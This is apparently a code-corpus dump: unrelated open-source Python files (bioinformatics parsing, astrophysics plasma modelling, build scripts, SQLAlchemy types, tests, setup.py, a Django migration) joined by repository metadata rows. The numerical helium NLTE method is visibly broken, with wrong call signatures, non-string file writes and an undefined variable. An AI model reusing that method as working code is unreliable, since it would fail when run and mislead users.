def natural_sort(input_list):
tryint = lambda x: int(x) if x.isdigit() else x
chunked_text = lambda x: [tryint(y) for y in re.split('([0-9]+)', x)]
sorted_list = sorted(input_list, key=chunked_text)
return sorted_list
def calc_total_exonic_length(list_of_exon_coords):
"""
Given a bunch of exonic coordinates, calculates the total length.
"""
return sum([max(x) - min(x) for x in list_of_exon_coords])
def get_attribute(gff3_row, attribute):
attr_search = re.search('{}=(.*?)(;|$)'.format(attribute), gff3_row[8])
if attr_search:
return attr_search.group(1)
else:
raise AttributeError("'{}' does not contain '{}='.".format(
'\t'.join(gff3_row), attribute))
def get_coords(gff3_row):
"""
Returned coordinates are in the tuple (startpos, endpos).
startpos/endpos are 0-based, not 1-based.
"""
strand = gff3_row[6]
if strand == '+':
startpos = int(gff3_row[3]) - 1
endpos = int(gff3_row[4])
elif strand == '-':
startpos = int(gff3_row[4])
endpos = int(gff3_row[3]) - 1
else:
print ('Error: "{}" has no valid strand information.'\
.format('\t'.join(gff3_row)))
raise SystemExit()
return (startpos, endpos)
def pick_longest_mRNA(gff_details):
"""
Given mRNAs contained in Genes, retain only the longest mRNA per gene.
The longest mRNA is the mRNA containing the longest total exonic length,
not raw mRNA length.
"""
for s in gff_details:
for g in gff_details[s]:
# for the sort, keys are sorted by longest exonic length in reverse.
# in case of ties, the longest mRNA (by length) is picked.
sorted_mRNA = sorted(gff_details[s][g].mRNAs,
key=lambda x: (-calc_total_exonic_length(
gff_details[s][g].mRNAs[x].details['exon']),
-len(gff_details[s][g].mRNAs[x])))
# eliminate all other keys except for the longest mRNA.
gff_details[s][g].mRNAs = {sorted_mRNA[0]:
gff_details[s][g].mRNAs[sorted_mRNA[0]]}
return gff_details
def sort_features(gff_details):
"""
Makes sure that feature coordinates are sorted in the right order
(i.e. ascending order for genes in the 5'-3' order; descending for
genes that are in the 3'-5' order).
"""
for s in gff_details:
for g in gff_details[s]:
for m in gff_details[s][g].mRNAs:
for f in gff_details[s][g].mRNAs[m].details:
# gff_details[s][g].mRNAs[m].details[f] has data in the
# form of coordinates, e.g. [(23559, 22882), (22781, 22387)]
coords = gff_details[s][g].mRNAs[m].details[f]
if len(coords) == 1: continue
desc_order = coords[0][0] > coords[0][1]
gff_details[s][g].mRNAs[m].details[f] = \
sorted(coords, reverse=desc_order)
return gff_details
def parse_gff3(gff_file, select_feature='all'):
"""
'gff_file' refers to file object containing gff file.
'select_feature' can be used to select for one or more features of interest
in the gff file (e.g. "three_prime_UTR", ['three_prime_UTR', 'five_prime_UTR'])
NOTE: all variables are named according to convention!
"""
gff_details = {}
tsv_reader = csv.reader(gff_file, delimiter='\t')
for row in tsv_reader:
# ignore blank lines and comments (lines starting with '#')
if not row: continue
if row[0].startswith('#'): continue
feature = row[2]
# ignore lines that do not correspond to the feature wanted (with the
# exception of gene and mRNA, we always want that information).
if select_feature == 'all' or feature in ['gene', 'mRNA'] \
or feature in select_feature:
seqid = row[0]
if seqid not in gff_details:
gff_details[seqid] = {}
coords = get_coords(row)
if feature == 'gene':
gene_id = get_attribute(row, 'ID')
gff_details[seqid][gene_id] = Gene(coords)
elif feature == 'mRNA':
mRNA_id = get_attribute(row, 'ID')
gff_details[seqid][gene_id].add_mRNA(mRNA_id, coords)
else:
# mRNA_ids might be multiple IDs, separated with commas.
mRNA_ids = get_attribute(row, 'Parent')
for m in mRNA_ids.split(','):
gff_details[seqid][gene_id].mRNAs[m].add_feature(feature, coords)
return gff_details
# debug
# if __name__ == '__main__':
# temp = parse_gff3(open('test.gff3'), select_feature='exon')
# print (temp['ctg123']['gene00001'].mRNAs)
# print (pick_longest_mRNA(temp)['ctg123']['gene00001'].mRNAs)
| gpl-3.0 | 4,050,465,350,289,512,000 | 37.762791 | 85 | 0.572663 | false |
tardis-sn/tardis | tardis/plasma/properties/nlte.py | 1 | 10502 | import logging
import os
import numpy as np
import pandas as pd
from tardis.plasma.properties.base import (
PreviousIterationProperty,
ProcessingPlasmaProperty,
)
from tardis.plasma.properties.ion_population import PhiSahaNebular
__all__ = [
"PreviousElectronDensities",
"PreviousBetaSobolev",
"HeliumNLTE",
"HeliumNumericalNLTE",
]
logger = logging.getLogger(__name__)
class PreviousElectronDensities(PreviousIterationProperty):
"""
Attributes
----------
previous_electron_densities : The values for the electron densities converged upon in the previous iteration.
"""
outputs = ("previous_electron_densities",)
def set_initial_value(self, kwargs):
initial_value = pd.Series(
1000000.0,
index=kwargs["abundance"].columns,
)
self._set_initial_value(initial_value)
class PreviousBetaSobolev(PreviousIterationProperty):
"""
Attributes
----------
previous_beta_sobolev : The beta sobolev values converged upon in the previous iteration.
"""
outputs = ("previous_beta_sobolev",)
def set_initial_value(self, kwargs):
initial_value = pd.DataFrame(
1.0,
index=kwargs["atomic_data"].lines.index,
columns=kwargs["abundance"].columns,
)
self._set_initial_value(initial_value)
class HeliumNLTE(ProcessingPlasmaProperty):
outputs = ("helium_population",)
@staticmethod
def calculate(
level_boltzmann_factor,
ionization_data,
beta_rad,
g,
g_electron,
w,
t_rad,
t_electrons,
delta,
zeta_data,
number_density,
partition_function,
):
"""
Updates all of the helium level populations according to the helium NLTE recomb approximation.
"""
helium_population = level_boltzmann_factor.loc[2].copy()
# He I excited states
he_one_population = HeliumNLTE.calculate_helium_one(
g_electron, beta_rad, ionization_data, level_boltzmann_factor, g, w
)
helium_population.loc[0].update(he_one_population)
# He I ground state
helium_population.loc[0, 0] = 0.0
# He II excited states
he_two_population = level_boltzmann_factor.loc[2, 1].mul(
(g.loc[2, 1, 0] ** (-1.0))
)
helium_population.loc[1].update(he_two_population)
# He II ground state
helium_population.loc[1, 0] = 1.0
# He III states
helium_population.loc[2, 0] = HeliumNLTE.calculate_helium_three(
t_rad,
w,
zeta_data,
t_electrons,
delta,
g_electron,
beta_rad,
ionization_data,
g,
)
# unnormalised = helium_population.sum()
# normalised = helium_population.mul(number_density.ix[2] / unnormalised)
# helium_population.update(normalised)
return helium_population
@staticmethod
def calculate_helium_one(
g_electron, beta_rad, ionization_data, level_boltzmann_factor, g, w
):
"""
Calculates the He I level population values, in equilibrium with the He II ground state.
"""
return (
level_boltzmann_factor.loc[2, 0]
* (1.0 / (2 * g.loc[2, 1, 0]))
* (1 / g_electron)
* (1 / (w ** 2.0))
* np.exp(ionization_data.loc[2, 1] * beta_rad)
)
@staticmethod
def calculate_helium_three(
t_rad,
w,
zeta_data,
t_electrons,
delta,
g_electron,
beta_rad,
ionization_data,
g,
):
"""
Calculates the He III level population values.
"""
zeta = PhiSahaNebular.get_zeta_values(zeta_data, 2, t_rad)[1]
he_three_population = (
2
* (float(g.loc[2, 2, 0]) / g.loc[2, 1, 0])
* g_electron
* np.exp(-ionization_data.loc[2, 2] * beta_rad)
* w
* (delta.loc[2, 2] * zeta + w * (1.0 - zeta))
* (t_electrons / t_rad) ** 0.5
)
return he_three_population
class HeliumNumericalNLTE(ProcessingPlasmaProperty):
"""
IMPORTANT: This particular property requires a specific numerical NLTE
solver and a specific atomic dataset (neither of which are distributed
with Tardis) to work.
"""
outputs = ("helium_population",)
def __init__(self, plasma_parent, heating_rate_data_file):
super(HeliumNumericalNLTE, self).__init__(plasma_parent)
self._g_upper = None
self._g_lower = None
self.heating_rate_data = np.loadtxt(heating_rate_data_file, unpack=True)
def calculate(
self,
ion_number_density,
electron_densities,
t_electrons,
w,
lines,
j_blues,
levels,
level_boltzmann_factor,
t_rad,
zeta_data,
g_electron,
delta,
partition_function,
ionization_data,
beta_rad,
g,
time_explosion,
):
logger.info("Performing numerical NLTE He calculations.")
if len(j_blues) == 0:
return None
# Outputting data required by SH module
for zone, _ in enumerate(electron_densities):
with open(
f"He_NLTE_Files/shellconditions_{zone}.txt", "w"
) as output_file:
output_file.write(ion_number_density.loc[2].sum()[zone])
output_file.write(electron_densities[zone])
output_file.write(t_electrons[zone])
output_file.write(self.heating_rate_data[zone])
output_file.write(w[zone])
output_file.write(time_explosion)
output_file.write(t_rad[zone])
output_file.write(self.plasma_parent.v_inner[zone])
output_file.write(self.plasma_parent.v_outer[zone])
for zone, _ in enumerate(electron_densities):
with open(
f"He_NLTE_Files/abundances_{zone}.txt", "w"
) as output_file:
for element in range(1, 31):
try:
number_density = (
ion_number_density[zone].loc[element].sum()
)
except:
number_density = 0.0
output_file.write(number_density)
helium_lines = lines[lines["atomic_number"] == 2]
helium_lines = helium_lines[helium_lines["ion_number"] == 0]
for zone, _ in enumerate(electron_densities):
with open(
f"He_NLTE_Files/discradfield_{zone}.txt", "w"
) as output_file:
j_blues = pd.DataFrame(j_blues, index=lines.index)
helium_j_blues = j_blues[zone].loc[helium_lines.index]
for value in helium_lines.index:
if helium_lines.level_number_lower.loc[value] < 35:
output_file.write(
int(helium_lines.level_number_lower.loc[value] + 1),
int(helium_lines.level_number_upper.loc[value] + 1),
j_blues[zone].loc[value],
)
# Running numerical simulations
for zone, _ in enumerate(electron_densities):
os.rename(
f"He_NLTE_Files/abundances{zone}.txt",
"He_NLTE_Files/abundances_current.txt",
)
os.rename(
f"He_NLTE_Files/shellconditions{zone}.txt",
"He_NLTE_Files/shellconditions_current.txt",
)
os.rename(
f"He_NLTE_Files/discradfield{zone}.txt",
"He_NLTE_Files/discradfield_current.txt",
)
os.system("nlte-solver-module/bin/nlte_solvertest >/dev/null")
os.rename(
"He_NLTE_Files/abundances_current.txt",
f"He_NLTE_Files/abundances{zone}.txt",
)
os.rename(
"He_NLTE_Files/shellconditions_current.txt",
f"He_NLTE_Files/shellconditions{zone}.txt",
)
os.rename(
"He_NLTE_Files/discradfield_current.txt",
f"He_NLTE_Files/discradfield{zone}.txt",
)
os.rename("debug_occs.dat", f"He_NLTE_Files/occs{zone}.txt")
# Reading in populations from files
helium_population = level_boltzmann_factor.loc[2].copy()
for zone, _ in enumerate(electron_densities):
with open(
f"He_NLTE_Files/discradfield{zone}.txt", "r"
) as read_file:
for level in range(0, 35):
level_population = read_file.readline()
level_population = float(level_population)
helium_population[zone].loc[0, level] = level_population
helium_population[zone].loc[1, 0] = float(read_file.readline())
# Performing He LTE level populations (upper two energy levels,
# He II excited states, He III)
he_one_population = HeliumNLTE.calculate_helium_one(
g_electron,
beta_rad,
partition_function,
ionization_data,
level_boltzmann_factor,
electron_densities,
g,
w,
t_rad,
t_electrons,
)
helium_population.loc[0, 35].update(he_one_population.loc[35])
helium_population.loc[0, 36].update(he_one_population.loc[36])
he_two_population = level_boltzmann_factor.loc[2, 1, 1:].mul(
(g.loc[2, 1, 0] ** (-1)) * helium_population.loc[s1, 0]
)
helium_population.loc[1, 1:].update(he_two_population)
helium_population.loc[2, 0] = HeliumNLTE.calculate_helium_three(
t_rad,
w,
zeta_data,
t_electrons,
delta,
g_electron,
beta_rad,
partition_function,
ionization_data,
electron_densities,
)
unnormalised = helium_population.sum()
normalised = helium_population.mul(
ion_number_density.loc[2].sum() / unnormalised
)
helium_population.update(normalised)
return helium_population
| bsd-3-clause | -4,974,188,119,503,110,000 | 32.552716 | 113 | 0.541516 | false |
mkodekar/Fennece-Browser | base/widget/themed/generate_themed_views.py | 1 | 2374 | #!/bin/python
# -*- Mode: python; c-basic-offset: 4; indent-tabs-mode: nil; tab-width: 40 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
'''
Script to generate Themed*.java source files for Fennec.
This script runs the preprocessor on a input template and writes
updated files into the source directory.
To update the themed views, update the input template
(ThemedView.java.frag) and run the script. Use version control to
examine the differences, and don't forget to commit the changes to the
template and the outputs.
'''
from __future__ import (
print_function,
unicode_literals,
)
import os
from mozbuild.preprocessor import Preprocessor
__DIR__ = os.path.dirname(os.path.abspath(__file__))
template = os.path.join(__DIR__, 'ThemedView.java.frag')
dest_format_string = 'Themed%(VIEW_NAME_SUFFIX)s.java'
views = [
dict(VIEW_NAME_SUFFIX='EditText',
BASE_TYPE='android.widget.EditText',
STYLE_CONSTRUCTOR=1),
dict(VIEW_NAME_SUFFIX='FrameLayout',
BASE_TYPE='android.widget.FrameLayout',
STYLE_CONSTRUCTOR=1),
dict(VIEW_NAME_SUFFIX='ImageButton',
BASE_TYPE='android.widget.ImageButton',
STYLE_CONSTRUCTOR=1,
TINT_FOREGROUND_DRAWABLE=1),
dict(VIEW_NAME_SUFFIX='ImageView',
BASE_TYPE='android.widget.ImageView',
STYLE_CONSTRUCTOR=1,
TINT_FOREGROUND_DRAWABLE=1),
dict(VIEW_NAME_SUFFIX='LinearLayout',
BASE_TYPE='android.widget.LinearLayout'),
dict(VIEW_NAME_SUFFIX='RelativeLayout',
BASE_TYPE='android.widget.RelativeLayout',
STYLE_CONSTRUCTOR=1),
dict(VIEW_NAME_SUFFIX='TextSwitcher',
BASE_TYPE='android.widget.TextSwitcher'),
dict(VIEW_NAME_SUFFIX='TextView',
BASE_TYPE='android.widget.TextView',
STYLE_CONSTRUCTOR=1),
dict(VIEW_NAME_SUFFIX='View',
BASE_TYPE='android.view.View',
STYLE_CONSTRUCTOR=1),
]
for view in views:
pp = Preprocessor(defines=view, marker='//#')
dest = os.path.join(__DIR__, dest_format_string % view)
with open(template, 'rU') as input:
with open(dest, 'wt') as output:
pp.processFile(input=input, output=output)
print('%s' % dest)
| mpl-2.0 | -6,609,594,954,600,994,000 | 32.43662 | 79 | 0.669756 | false |
cheungpat/sqlalchemy-utils | sqlalchemy_utils/types/currency.py | 1 | 2037 | babel = None
try:
import babel
except ImportError:
pass
import six
from sqlalchemy import types
from sqlalchemy_utils import ImproperlyConfigured
from sqlalchemy_utils.primitives import Currency
from .scalar_coercible import ScalarCoercible
class CurrencyType(types.TypeDecorator, ScalarCoercible):
"""
Changes :class:`.Currency` objects to a string representation on the way in
and changes them back to :class:`.Currency` objects on the way out.
In order to use CurrencyType you need to install Babel_ first.
.. _Babel: http://babel.pocoo.org/
::
from sqlalchemy_utils import CurrencyType, Currency
class User(Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, autoincrement=True)
name = sa.Column(sa.Unicode(255))
currency = sa.Column(CurrencyType)
user = User()
user.currency = Currency('USD')
session.add(user)
session.commit()
user.currency # Currency('USD')
user.currency.name # US Dollar
str(user.currency) # US Dollar
user.currency.symbol # $
CurrencyType is scalar coercible::
user.currency = 'US'
user.currency # Currency('US')
"""
impl = types.String(3)
python_type = Currency
def __init__(self, *args, **kwargs):
if babel is None:
raise ImproperlyConfigured(
"'babel' package is required in order to use CurrencyType."
)
super(CurrencyType, self).__init__(*args, **kwargs)
def process_bind_param(self, value, dialect):
if isinstance(value, Currency):
return value.code
elif isinstance(value, six.string_types):
return value
def process_result_value(self, value, dialect):
if value is not None:
return Currency(value)
def _coerce(self, value):
if value is not None and not isinstance(value, Currency):
return Currency(value)
return value
| bsd-3-clause | -8,878,608,680,686,917,000 | 24.4625 | 79 | 0.621993 | false |
Instawork/django-rest-framework-json-api | example/tests/integration/test_pagination.py | 1 | 2115 | from django.core.urlresolvers import reverse
import pytest
from example.tests.utils import dump_json, redump_json
pytestmark = pytest.mark.django_db
def test_pagination_with_single_entry(single_entry, client):
expected = {
"data": [
{
"type": "posts",
"id": "1",
"attributes":
{
"headline": single_entry.headline,
"bodyText": single_entry.body_text,
"pubDate": None,
"modDate": None
},
"meta": {
"bodyFormat": "text"
},
"relationships":
{
"blog": {
"data": {"type": "blogs", "id": "1"}
},
"authors": {
"meta": {"count": 1},
"data": [{"type": "authors", "id": "1"}]
},
"comments": {
"meta": {"count": 1},
"data": [{"type": "comments", "id": "1"}]
},
"suggested": {
"data": [],
"links": {
"related": "http://testserver/entries/1/suggested/",
"self": "http://testserver/entries/1/relationships/suggested"
}
}
}
}],
"links": {
"first": "http://testserver/entries?page=1",
"last": "http://testserver/entries?page=1",
"next": None,
"prev": None,
},
"meta":
{
"pagination":
{
"page": 1,
"pages": 1,
"count": 1
}
}
}
response = client.get(reverse("entry-list"))
content_dump = redump_json(response.content)
expected_dump = dump_json(expected)
assert content_dump == expected_dump
| bsd-2-clause | -7,632,098,763,866,832,000 | 29.652174 | 89 | 0.354137 | false |
pycarolinas/pycarolinas_org | fabfile.py | 1 | 1362 | import os
import re
import datetime
import string
import json
from fabric.contrib.project import rsync_project
from fabric.contrib.files import upload_template
from fabric.api import local, run, sudo
from fabric.state import env
from fabric.context_managers import cd
dev_conf = json.load(open('dev_conf.json'))
env.hosts = ['pycarolinas.org']
env.user = dev_conf['user']
env.project_dir = '/home/pycar/pycarolinas_org'
def clean():
local('find . -name "*.swp" -delete')
def build():
local('lessc pycarolinas_org/static/site.less pycarolinas_org/static/site.css')
def deploy(delete=True):
build()
rsync_project(local_dir='pycarolinas_org', remote_dir='/home/pycar/pycarolinas_org/')
collectstatic()
restart_django()
def nginx_update():
local('scp conf/pycarolinas-org.conf %[email protected]:/etc/nginx/sites-available/' % (env.user,))
sudo('service nginx restart')
def collectstatic():
run('env/bin/python pycarolinas_org/manage.py collectstatic -l --noinput --settings=pycarolinas_org.settings.local')
def stop_django():
run('kill `cat /home/pycar/django-fcgi.pid`')
def start_django():
run('env/bin/python pycarolinas_org/manage.py runfcgi host=127.0.0.1 port=8080 pidfile=/home/pycar/django-fcgi.pid --settings=pycarolinas_org.settings.local')
def restart_django():
stop_django()
start_django()
| mit | -4,509,938,444,805,112,300 | 28.608696 | 162 | 0.727606 | false |
ioram7/keystone-federado-pgid2013 | build/lxml/setup.py | 1 | 7602 | import os
import re
import sys
import fnmatch
# for command line options and supported environment variables, please
# see the end of 'setupinfo.py'
try:
import Cython
# may need to work around setuptools bug by providing a fake Pyrex
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "fake_pyrex"))
except ImportError:
pass
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import versioninfo
import setupinfo
# override these and pass --static for a static build. See
# doc/build.txt for more information. If you do not pass --static
# changing this will have no effect.
STATIC_INCLUDE_DIRS = []
STATIC_LIBRARY_DIRS = []
STATIC_CFLAGS = []
STATIC_BINARIES = []
# create lxml-version.h file
svn_version = versioninfo.svn_version()
versioninfo.create_version_h(svn_version)
print("Building lxml version %s." % svn_version)
OPTION_RUN_TESTS = setupinfo.has_option('run-tests')
branch_link = """
After an official release of a new stable series, bug fixes may become
available at
https://github.com/lxml/lxml/tree/lxml-%(branch_version)s .
Running ``easy_install lxml==%(branch_version)sbugfix`` will install
the unreleased branch state from
https://github.com/lxml/lxml/tarball/lxml-%(branch_version)s#egg=lxml-%(branch_version)sbugfix
as soon as a maintenance branch has been established. Note that this
requires Cython to be installed at an appropriate version for the build.
"""
if versioninfo.is_pre_release():
branch_link = ""
extra_options = {}
if 'setuptools' in sys.modules:
extra_options['zip_safe'] = False
extra_options.update(setupinfo.extra_setup_args())
extra_options['package_data'] = {
'lxml': [
'lxml.etree.h',
'lxml.etree_api.h',
],
'lxml.includes': [
'*.pxd', '*.h'
],
'lxml.isoschematron': [
'resources/rng/iso-schematron.rng',
'resources/xsl/*.xsl',
'resources/xsl/iso-schematron-xslt1/*.xsl',
'resources/xsl/iso-schematron-xslt1/readme.txt'
],
}
extra_options['package_dir'] = {
'': 'src'
}
extra_options['packages'] = [
'lxml', 'lxml.includes', 'lxml.html', 'lxml.isoschematron'
]
def setup_extra_options():
is_interesting_package = re.compile('^(libxml|libxslt|libexslt)$').match
def extract_files(directories, pattern='*'):
def get_files(root, dir_path, files):
return [ (root, dir_path, filename)
for filename in fnmatch.filter(files, pattern) ]
file_list = []
for dir_path in directories:
dir_path = os.path.realpath(dir_path)
for root, dirs, files in os.walk(dir_path):
rel_dir = root[len(dir_path)+1:]
if is_interesting_package(rel_dir):
file_list.extend(get_files(root, rel_dir, files))
return file_list
def build_packages(files):
packages = {}
seen = set()
for root_path, rel_path, filename in files:
if filename in seen:
# libxml2/libxslt header filenames are unique
continue
seen.add(filename)
package_path = '.'.join(rel_path.split(os.sep))
if package_path in packages:
root, package_files = packages[package_path]
if root != root_path:
print("conflicting directories found for include package '%s': %s and %s"
% (package_path, root_path, root))
continue
else:
package_files = []
packages[package_path] = (root_path, package_files)
package_files.append(filename)
return packages
# Copy Global Extra Options
extra_opts = dict(extra_options)
# Build ext modules
ext_modules = setupinfo.ext_modules(
STATIC_INCLUDE_DIRS, STATIC_LIBRARY_DIRS,
STATIC_CFLAGS, STATIC_BINARIES)
extra_opts['ext_modules'] = ext_modules
packages = extra_opts.get('packages', list())
package_dir = extra_opts.get('package_dir', dict())
package_data = extra_opts.get('package_data', dict())
# Add lxml.include with (lxml, libxslt headers...)
# python setup.py build --static --static-deps install
# python setup.py bdist_wininst --static
if setupinfo.OPTION_STATIC:
include_dirs = [] # keep them in order
for extension in ext_modules:
for inc_dir in extension.include_dirs:
if inc_dir not in include_dirs:
include_dirs.append(inc_dir)
header_packages = build_packages(extract_files(include_dirs))
for package_path, (root_path, filenames) in header_packages.items():
if package_path:
package = 'lxml.includes.' + package_path
packages.append(package)
else:
package = 'lxml.includes'
package_data[package] = filenames
package_dir[package] = root_path
return extra_opts
setup(
name = "lxml",
version = versioninfo.version(),
author="lxml dev team",
author_email="[email protected]",
maintainer="lxml dev team",
maintainer_email="[email protected]",
url="http://lxml.de/",
download_url="http://pypi.python.org/packages/source/l/lxml/lxml-%s.tar.gz" % versioninfo.version(),
bugtrack_url="https://bugs.launchpad.net/lxml",
description="Powerful and Pythonic XML processing library combining libxml2/libxslt with the ElementTree API.",
long_description=((("""\
lxml is a Pythonic, mature binding for the libxml2 and libxslt libraries. It
provides safe and convenient access to these libraries using the ElementTree
API.
It extends the ElementTree API significantly to offer support for XPath,
RelaxNG, XML Schema, XSLT, C14N and much more.
To contact the project, go to the `project home page
<http://lxml.de/>`_ or see our bug tracker at
https://launchpad.net/lxml
In case you want to use the current in-development version of lxml,
you can get it from the github repository at
https://github.com/lxml/lxml . Note that this requires Cython to
build the sources, see the build instructions on the project home
page. To the same end, running ``easy_install lxml==dev`` will
install lxml from
https://github.com/lxml/lxml/tarball/master#egg=lxml-dev if you have
an appropriate version of Cython installed.
""" + branch_link) % { "branch_version" : versioninfo.branch_version() }) +
versioninfo.changes()),
classifiers = [
versioninfo.dev_status(),
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: BSD License',
'Programming Language :: Cython',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: C',
'Operating System :: OS Independent',
'Topic :: Text Processing :: Markup :: HTML',
'Topic :: Text Processing :: Markup :: XML',
'Topic :: Software Development :: Libraries :: Python Modules'
],
**setup_extra_options()
)
if OPTION_RUN_TESTS:
print("Running tests.")
import test
sys.exit( test.main(sys.argv[:1]) )
| apache-2.0 | 6,812,969,616,549,763,000 | 32.9375 | 115 | 0.638253 | false |
Plasmatium/google-python-exercises | basic/solution/mimic.py | 1 | 2998 | #!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
"""Mimic pyquick exercise -- optional extra exercise.
Google's Python Class
Read in the file specified on the command line.
Do a simple split() on whitespace to obtain all the words in the file.
Rather than read the file line by line, it's easier to read
it into one giant string and split it once.
Build a "mimic" dict that maps each word that appears in the file
to a list of all the words that immediately follow that word in the file.
The list of words can be be in any order and should include
duplicates. So for example the key "and" might have the list
["then", "best", "then", "after", ...] listing
all the words which came after "and" in the text.
We'll say that the empty string is what comes before
the first word in the file.
With the mimic dict, it's fairly easy to emit random
text that mimics the original. Print a word, then look
up what words might come next and pick one at random as
the next work.
Use the empty string as the first word to prime things.
If we ever get stuck with a word that is not in the dict,
go back to the empty string to keep things moving.
Note: the standard python module 'random' includes a
random.choice(list) method which picks a random element
from a non-empty list.
For fun, feed your program to itself as input.
Could work on getting it to put in linebreaks around 70
columns, so the output looks better.
"""
import random
import sys
def mimic_dict(filename):
"""Returns mimic dict mapping each word to list of words which follow it."""
# +++your code here+++
# LAB(begin solution)
mimic_dict = {}
f = open(filename, 'r')
text = f.read()
f.close()
words = text.split()
prev = ''
for word in words:
if not prev in mimic_dict:
mimic_dict[prev] = [word]
else:
mimic_dict[prev].append(word)
# Could write as: mimic_dict[prev] = mimic_dict.get(prev, []) + [word]
# It's one line, but not totally satisfying.
prev = word
return mimic_dict
# LAB(replace solution)
# return
# LAB(end solution)
def print_mimic(mimic_dict, word):
"""Given mimic dict and start word, prints 200 random words."""
# +++your code here+++
# LAB(begin solution)
for unused_i in range(200):
print (word)
nexts = mimic_dict.get(word) # Returns None if not found
if not nexts:
nexts = mimic_dict[''] # Fallback to '' if not found
word = random.choice(nexts)
# The 'unused_' prefix turns off the lint warning about the unused variable.
# LAB(replace solution)
# return
# LAB(end solution)
# Provided main(), calls mimic_dict() and mimic()
def main():
if len(sys.argv) != 2:
print ('usage: ./mimic.py file-to-read')
sys.exit(1)
dict = mimic_dict(sys.argv[1])
print_mimic(dict, '')
if __name__ == '__main__':
main()
| apache-2.0 | 8,982,271,780,434,043,000 | 29.282828 | 78 | 0.693796 | false |
jmwenda/hypermap | hypermap/aggregator/tests/test_warper.py | 1 | 1877 | # -*- coding: utf-8 -*-
"""
Tests for the WMS Service Type.
"""
import unittest
from httmock import with_httmock
import mocks.warper
from aggregator.models import Service
class TestWarper(unittest.TestCase):
@with_httmock(mocks.warper.resource_get)
def test_create_wms_service(self):
# create the service
service = Service(
type='WARPER',
url='http://warper.example.com/warper/maps',
)
service.save()
# check layer number
self.assertEqual(service.layer_set.all().count(), 15)
# check layer 0 (public)
layer_0 = service.layer_set.all()[0]
self.assertEqual(layer_0.name, '29568')
self.assertEqual(layer_0.title, 'Plate 24: Map bounded by Myrtle Avenue')
self.assertTrue(layer_0.is_public)
self.assertEqual(layer_0.keywords.all().count(), 0)
self.assertEqual(layer_0.srs.all().count(), 3)
self.assertEqual(layer_0.check_set.all().count(), 1)
self.assertEqual(layer_0.layerdate_set.all()[0].date, '1855-01-01')
# a layer with no bbox must be stored with None coordinates
layer_no_bbox = service.layer_set.get(name='16239')
self.assertEqual(layer_no_bbox.bbox_x0, None)
self.assertEqual(layer_no_bbox.bbox_y0, None)
self.assertEqual(layer_no_bbox.bbox_x1, None)
self.assertEqual(layer_no_bbox.bbox_y1, None)
# test that if creating the service and is already exiting it is not being duplicated
# create the service
def create_duplicated_service():
duplicated_service = Service(
type='WARPER',
url='http://warper.example.com/warper/maps',
)
duplicated_service.save()
self.assertRaises(Exception, create_duplicated_service)
if __name__ == '__main__':
unittest.main()
| mit | -4,989,812,792,306,742,000 | 31.362069 | 93 | 0.623868 | false |
marvin-ai/marvin-python-toolbox | tests/common/test_data_source_provider.py | 1 | 2519 | #!/usr/bin/env python
# coding=utf-8
# Copyright [2017] [B2W Digital]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import findspark
findspark.init()
# is important to import these classes after findspark.init call
from pyspark.tests import ReusedPySparkTestCase
from marvin_python_toolbox.common.data_source_provider import get_spark_session
try:
import mock
except ImportError:
import unittest.mock as mock
class TestDataSourceProvider:
@mock.patch("pyspark.sql.SparkSession")
def test_get_spark_session(self, mocked_session):
spark = get_spark_session()
assert spark
mocked_session.assert_has_calls([
mock.call.builder.appName('marvin-engine'),
mock.call.builder.appName().getOrCreate()]
)
spark = get_spark_session(app_name='TestEngine')
assert spark
mocked_session.assert_has_calls([
mock.call.builder.appName('TestEngine'),
mock.call.builder.appName().getOrCreate()]
)
spark = get_spark_session(configs=[("spark.xxx", "true")])
assert spark
mocked_session.assert_has_calls([
mock.call.builder.appName('TestEngine'),
mock.call.builder.appName().getOrCreate()]
)
@mock.patch("pyspark.sql.SparkSession")
def test_get_spark_session_with_hive(self, mocked_session):
spark = get_spark_session(enable_hive=True)
assert spark
mocked_session.assert_has_calls([
mock.call.builder.appName('marvin-engine'),
mock.call.builder.appName().enableHiveSupport(),
mock.call.builder.appName().enableHiveSupport().getOrCreate()]
)
class TestSparkDataSource(ReusedPySparkTestCase):
def test_spark_initialization(self):
rdd = self.sc.parallelize(['Hi there', 'Hi'])
counted = rdd.flatMap(lambda word: word.split(' ')).map(lambda word: (word, 1)).reduceByKey(lambda acc, n: acc + n)
assert counted.collectAsMap() == {'Hi': 2, 'there': 1}
| apache-2.0 | -8,286,194,955,248,077,000 | 34.478873 | 123 | 0.676459 | false |
mingot/detectme_server | detectme/detectors/migrations/0003_auto__add_field_detector_training_log.py | 1 | 8577 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Detector.training_log'
db.add_column(u'detectors_detector', 'training_log',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Detector.training_log'
db.delete_column(u'detectors_detector', 'training_log')
models = {
u'accounts.detectmeprofile': {
'Meta': {'object_name': 'DetectMeProfile'},
'favourite_snack': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mugshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
